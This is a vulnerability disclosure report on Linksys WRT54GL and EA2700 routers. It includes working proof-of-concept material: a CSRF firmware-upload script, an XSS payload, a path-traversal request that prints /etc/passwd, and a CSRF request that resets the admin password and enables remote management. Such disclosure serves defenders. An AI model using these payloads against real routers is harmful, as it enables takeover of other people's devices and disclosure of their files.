# Linksys Router Vulnerabilities
I would like to report several vulnerabilities in Linksys network equipment. A public advisory regarding these issues may be released 30 days after sending this report. I'm more than happy to help you with testing or verifying these issues if you would like.
1. Linksys WRT54GL Firmware Upload CSRF Vulnerability
2. Linksys EA2700 XSS Vulnerability
3. Linksys EA2700 File Path Traversal Vulnerability
4. Linksys EA2700 Password Change Insufficient Authentication and CSRF Vulnerability
5. Linksys EA2700 Source Code Disclosure Vulnerability
## 1. Linksys WRT54GL Firmware Upload CSRF Vulnerability
### Vulnerable URL
http://192.168.1.1/upgrade.cgi
### Description
Lack of CSRF prevention on the upgrade firmware page could allow for a CSRF attack that replaces the router firmware.
### Proof of Concept
<script>
function fileUpload(url, fileData, fileName) {
var fileSize = fileData.length, boundary = "---------------------------168072824752491622650073", xhr = new XMLHttpRequest;
xhr.open("POST", url, true);
xhr.withCredentials = "true";
xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary=" + boundary);
var body = boundary + "\r\n";
body += "Content-Disposition: form-data; name=\"submit_button\"; name=\"submit_button\" \r\n\r\nUpgrade\r\n";
body += boundary + "\r\nContent-Disposition: form-data; name=\"change_action\"\r\n\r\n\r\n";
body += boundary + "\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\n\r\n";
body += boundary + "\r\nContent-Disposition: form-data; name=\"file\"; filename=\"FW_WRT54GL_4.30.15.002_US_20101208_code.bin\"\r\n";
body += "Content-Type: application/macbinary\r\n";
body += "\r\n" + fileData + "\r\n\r\n";
body += boundary + "\r\nConntent-Disposition: form-data; name=\"process\"\r\n\r\n\r\n";
body += boundary + "--";
if(navigator.userAgent.toLowerCase().indexOf("chrome") > -1) {
XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
function byteValue(x) {
return x.charCodeAt(0) & 255
}
var ords = Array.prototype.map.call(datastr, byteValue);
var ui8a = new Uint8Array(ords);
this.send(ui8a.buffer)
}
}
xhr.sendAsBinary(body);
return true
}
fileUpload("http://192.167.0.1/upgrade.cgi", "W54G....", "myFile.gif");
</script>
## 2. Linksys EA2700 XSS Vulnerability
### Vulnerable URL
http://192.168.1.1/apply.cgi
### Vulnerable Parameter
submit_button
### Description
Lack of proper parameter value sanitization can result in reflected Cross-Site Scripting (XSS) on the apply.cgi page.
### Proof of Concept
REQUEST
POST /apply.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
submit_button=xss'%3balert(1)//934&action=Apply
RESPONSE
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Date: Wed, 29 Jun 2011 17:37:39 GMT
Server: lighttpd/1.4.28
Content-Length: 32467
<!--
// Utopia_Init: SUCCEEDED (rc = 1)
// Utopia_GetDeviceSettings: SUCCEEDED (rc = 0)
// DEVICE SETTINGS:
// hostname = Cisco11159
// lang = en-US
// tz gmt offset = -8.000000
// auto_dst = 1
// Utopia_GetDeviceInfo: SUCCEEDED (rc = 0)
// DEVICE INFO:
// firmware version = 1.0.12
// firmware revision = 128947
// firmware build date = 2012-02-18 07:57
// model name = EA2700
// current time = Wed Jun 29 10:37:39 2011
// wan_mac_address = 20:aa:4b:76:9c:5b
// wan_domainname =
//----------------------------------------------------------
// referrer page = xss';alert(1)//934.asp
// wait time = 0
// submit flag = 0
-->
<HTML dir="ltr">
<head>
[<meta http-equiv="expires" content="0">
<meta http-equiv="cache-control" content="no-cache">
<meta http-equiv="pragma" content="no-cache">
<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<script type="text/javascript" charset="utf-8" src="/i18n/en_lang_pack.js"></script>
<SCRIPT language=JavaScript>
// *
// * Copyright (C) 2010, Cisco Systems, Inc.
// * All Rights Reserved.
// *
// * THIS SOFTWARE IS OFFERED "AS IS", AND CISCO GRANTS NO WARRANTIES OF ANY
// * KIND, EXPRESS OR IMPLIED, BY STATUTE, COMMUNICATION OR OTHERWISE. CISCO
// * SPECIFICALLY DISCLAIMS ANY IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS
// * FOR A SPECIFIC PURPOSE OR NONINFRINGEMENT CONCERNING THIS SOFTWARE.
// *
[..SNIP..]
<!-- Template error: Unable to open template file -->
<!-- Template error: Unable to open template file -->
<!-- Template error: Unable to open template file -->
var submit_button = 'xss';alert(1)//934.asp';
var wait_time = '0';
var continue_button = 1;
var t1 = new Date().getTime();
[..SNIP..]
## 3. Linksys EA2700 File Path Traversal Vulnerability
### Vulnerable URL
http://192.168.1.1/apply.cgi
### Description
Inserting local system file paths in the "next_page" parameter results in the disclosure of files within the underlying filesystem.
### Proof of Concept
REQUEST
POST /apply.cgi HTTP/1.1Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
submit_button=Wireless_Basic&change_action=gozila_cgi&next_page=/etc/passwd
RESPONSE
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Date: Wed, 29 Jun 2011 17:50:20 GMT
Server: lighttpd/1.4.28
Content-Length: 1850
<!--
// Utopia_Init: SUCCEEDED (rc = 1)
// Utopia_GetDeviceSettings: SUCCEEDED (rc = 0)
// DEVICE SETTINGS:
// hostname = Cisco11159
// lang = en-US
// tz gmt offset = -8.000000
// auto_dst = 1
// Utopia_GetDeviceInfo: SUCCEEDED (rc = 0)
// DEVICE INFO:
// firmware version = 1.0.12
// firmware revision = 128947
// firmware build date = 2012-02-18 07:57
// model name = EA2700
// current time = Wed Jun 29 10:50:20 2011
// wan_mac_address = 20:aa:4b:76:9c:5b
// wan_domainname =
// Utopia_GetWifiRadioState[0]: SUCCEEDED (rc = 0)
// WIFI STATE (2.4 GHz): ENABLED
// Utopia_GetWifiRadioSettings[0]: SUCCEEDED (rc = 0)
// WIFI SETTINGS (2.4 GHz):
// interface = 0
// enabled = 1
// ssid broadcast = 1
// mac address = 20:aa:4b:76:9c:5c
// mode = 6
// band = 0
// channel = 0
// Utopia_GetWifiRadioState[1]: SUCCEEDED (rc = 0)
// WIFI STATE (5 GHz): ENABLED
// Utopia_GetWifiRadioSettings[1]: SUCCEEDED (rc = 0)
// WIFI SETTINGS (5 GHz):
// interface = 0
// enabled = 1
// ssid broadcast = 1
// mac address = 20:aa:4b:76:9c:5e
// mode = 7
// band = 0
// channel = 0
// Utopia_GetWifiSecuritySettings[0]: SUCCEEDED (rc = 0)
// wl0_sec_mode = 0
// wl0_key_renewal_interval = 0
// wl0_encrypt = 0
// Utopia_GetWifiSecuritySettings[1]: SUCCEEDED (rc = 0)
// wl1_sec_mode = 0
// wl1_key_renewal_interval = 0
// Utopia_GetWifiBridgeSettings: SUCCEEDED (rc = 0)
// WIFI BRIDGE SETTINGS:
// bridge mode = 0
// bridge ssid =
//----------------------------------------------------------
// referrer page = Wireless_Basic.asp
// wait time = 0
// submit flag = 0
-->
root:x:0:0::/:/bin/sh
nobody:x:99:99:Nobody:/:/bin/nologin
sshd:x:22:22::/var/empty:/sbin/nologin
admin:x:1000:1000:Admin User:/tmp/home/admin:/bin/sh
quagga:x:1001:1001:Quagga:/var/empty:/bin/nologin
firewall:x:1002:1002:Firewall:/var/empty:/bin/nologin
## 4. Linksys EA2700 Password Change Insufficient Authentication and CSRF Vulnerability
### Vulnerable URL
http://192.168.1.1/upgrade.cgi
### Description
Lack of proper access controls on the router web administration interface allow attackers on the same network to make changes to the device without authentiation. Attackers on the Internet can also take advantage of the lack of CSRF controls on the device to initiate a CSRF attack towards users on the proper network in order to make changes to the device. Vulnerable settings include: Changing the device password, enabling the remote management (WAN management), toggling UPnP
### Proof of Concept
CSRF to change the password and enable remote management
REQUEST
POST /apply.cgi HTTP/1.1Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 370
submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&http_passwd=password&http_passwdConfirm=password&_http_enable=1&web_wl_filter=0&remote_management=1&_remote_mgt_https=1&remote_ip_any=1&http_wanport=8080&nf_alg_sip=0&ctf_enable=1&upnp_enable=1&upnp_config=1&upnp_internet_dis=0
## 5. Linksys Router Source Code Disclosure Vulnerability
### Vulnerable URL
http://192.168.1.1/Management.asp/
### Description
By adding a slash ("/") to the end of the URL path, the router returns the raw source code of the page
Source link: https://superevr.com/blog/2013/dont-use-linksys-routers/
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information